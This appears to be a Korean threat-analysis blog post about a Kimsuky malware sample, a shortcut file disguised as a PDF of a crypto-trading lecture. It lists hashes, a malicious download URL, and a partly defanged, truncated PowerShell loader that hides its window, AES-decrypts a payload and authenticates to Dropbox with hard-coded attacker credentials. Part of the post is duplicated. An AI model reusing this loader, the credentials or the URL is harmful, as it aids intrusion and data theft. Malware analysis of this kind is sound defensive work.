김수키(Kimsuky) 가상화폐(암호 화폐)로 위장한 트레이딩 스파르타코스 강의안-100불남(2차).pdf(2024.1.22)
Contents
오늘은 북한 해킹 단체 김수키(Kimsuky) 에서 만든 악성코드인 트레이딩 스파르타코스 강의안-100불남(2차)pdf(2024.1.22) 에 대해 글을 적어 보겠습니다.
일단 해당 악성코드는 lnk 파일로 바로 가기 형태를 띠는데, 피해자에게는 pdf 파일로 위장하기 위하여서 .pdf.lnk 형태의 확장자를 사용하는 것이 특징이며 당연히 해당 Cerbero Suite Advanced 등의 도구로 까보면 역시나 Powershell 로 동작을 하게 되어져 있습니다.
먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:트레이딩 스파르타코스 강의안-100불남(2차).pdf.lnk
사이즈:1.05 MB
MD5:fcdcc6c56ae43f7a78413cc5204e9314
SHA-1:d2fca321091b4914b2ab813b4b1b83b3fa90d985
SHA-256:befa4094eb7ceb31be76ec98b11353b296b57476fe1b69db916e02bc8efce7d7
일단 Powershell 코드는 다음과 같습니다.
c powershell -windowstyle hidden -nop -NoProfile -No(n)Interactive -c "$tmp = '%temp%';Function AESDecr(y)pt { param ( [Byte[]]$b(y)tes, [String]$pass=\"pa55w0rd\") $InputStream = New-Object Syst(e)m.IO.MemoryStream (,$byt(e)s);$OutputStream = New-Object System.IO.MemoryStream;$Salt = Ne(w)-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Le(n)gth);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cr(y)ptography.Rfc2898DeriveBytes($pass, $Salt) ;$AESKey = $PBKDF2.GetBytes(32);$AES(I)V = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.A(e)sManaged;$Dec = $AES.C(r)eateDecryptor($AESKey, $AESIV) ;$CryptoStream = Ne(w)-Object System.Security.Cryptography(.)CryptoStream($InputStream, $Dec, [System.Security.Cryptography.C(r)yptoStreamMode]::Read);$CryptoStream.CopyTo ($OutputStream);$OutputStream.Dispose();retu(r)n $OutputS(t)ream.ToArray();} $len1 1055490;$l(e)n2 = 1104130;$len3 = 1104130;$(l)en4 = 0x0010D99E; $clientID = \"6nyl8w1u3w4k2lz\";$clientSecret = \"ikan154e(e)87osqq\";$refreshToken = \"h_QLZB8VqqoAAAAAAAAAASvKa1MT2U3VD-iDx_3_C_QVY1(e)Pp0C5Ka4FUa33Eux1\";$body = @{grant_type=\"refresh_token\";refresh_t(o)ken=$refreshToken;client_id=$clientID ;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi(.)com/oauth2/token\";$response = Invoke-R(e)stMethod -Uri $tokenEndpoint -Meth(o)d Post …
일단 해당 악성코드는 lnk 파일로 바로 가기 형태를 띠는데, 피해자에게는 pdf 파일로 위장하기 위하여서 .pdf.lnk 형태의 확장자를 사용하는 것이 특징이며 당연히 해당 Cerbero Suite Advanced 등의 도구로 까보면 역시나 Powershell 로 동작을 하게 되어져 있습니다.
먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:트레이딩 스파르타코스 강의안-100불남(2차).pdf.lnk
사이즈:1.05 MB
MD5:fcdcc6c56ae43f7a78413cc5204e9314
SHA-1:d2fca321091b4914b2ab813b4b1b83b3fa90d985
SHA-256:befa4094eb7ceb31be76ec98b11353b296b57476fe1b69db916e02bc8efce7d7
일단 Powershell 코드는 다음과 같습니다.
c powershell -windowstyle hidden -nop -NoProfile -No(n)Interactive -c "$tmp = '%temp%';Function AESDecr(y)pt { param ( [Byte[]]$b(y)tes, [String]$pass=\"pa55w0rd\") $InputStream = New-Object Syst(e)m.IO.MemoryStream (,$byt(e)s);$OutputStream = New-Object System.IO.MemoryStream;$Salt = Ne(w)-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Le(n)gth);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cr(y)ptography.Rfc2898DeriveBytes($pass, $Salt) ;$AESKey = $PBKDF2.GetBytes(32);$AES(I)V = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.A(e)sManaged;$Dec = $AES.C(r)eateDecryptor($AESKey, $AESIV) ;$CryptoStream = Ne(w)-Object System.Security.Cryptography(.)CryptoStream($InputStream, $Dec, [System.Security.Cryptography.C(r)yptoStreamMode]::Read);$CryptoStream.CopyTo ($OutputStream);$OutputStream.Dispose();retu(r)n $OutputS(t)ream.ToArray();} $len1 1055490;$l(e)n2 = 1104130;$len3 = 1104130;$(l)en4 = 0x0010D99E; $clientID = \"6nyl8w1u3w4k2lz\";$clientSecret = \"ikan154e(e)87osqq\";$refreshToken = \"h_QLZB8VqqoAAAAAAAAAASvKa1MT2U3VD-iDx_3_C_QVY1(e)Pp0C5Ka4FUa33Eux1\";$body = @{grant_type=\"refresh_token\";refresh_t(o)ken=$refreshToken;client_id=$clientID ;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi(.)com/oauth2/token\";$response = Invoke-R(e)stMethod -Uri $tokenEndpoint -Meth(o)d Post …
IoC
befa4094eb7ceb31be76ec98b11353b296b57476fe1b69db916e02bc8efce7d7
d2fca321091b4914b2ab813b4b1b83b3fa90d985
fcdcc6c56ae43f7a78413cc5204e9314
https://hyojadong.kr/js/slick/doc/1.pdf
d2fca321091b4914b2ab813b4b1b83b3fa90d985
fcdcc6c56ae43f7a78413cc5204e9314
https://hyojadong.kr/js/slick/doc/1.pdf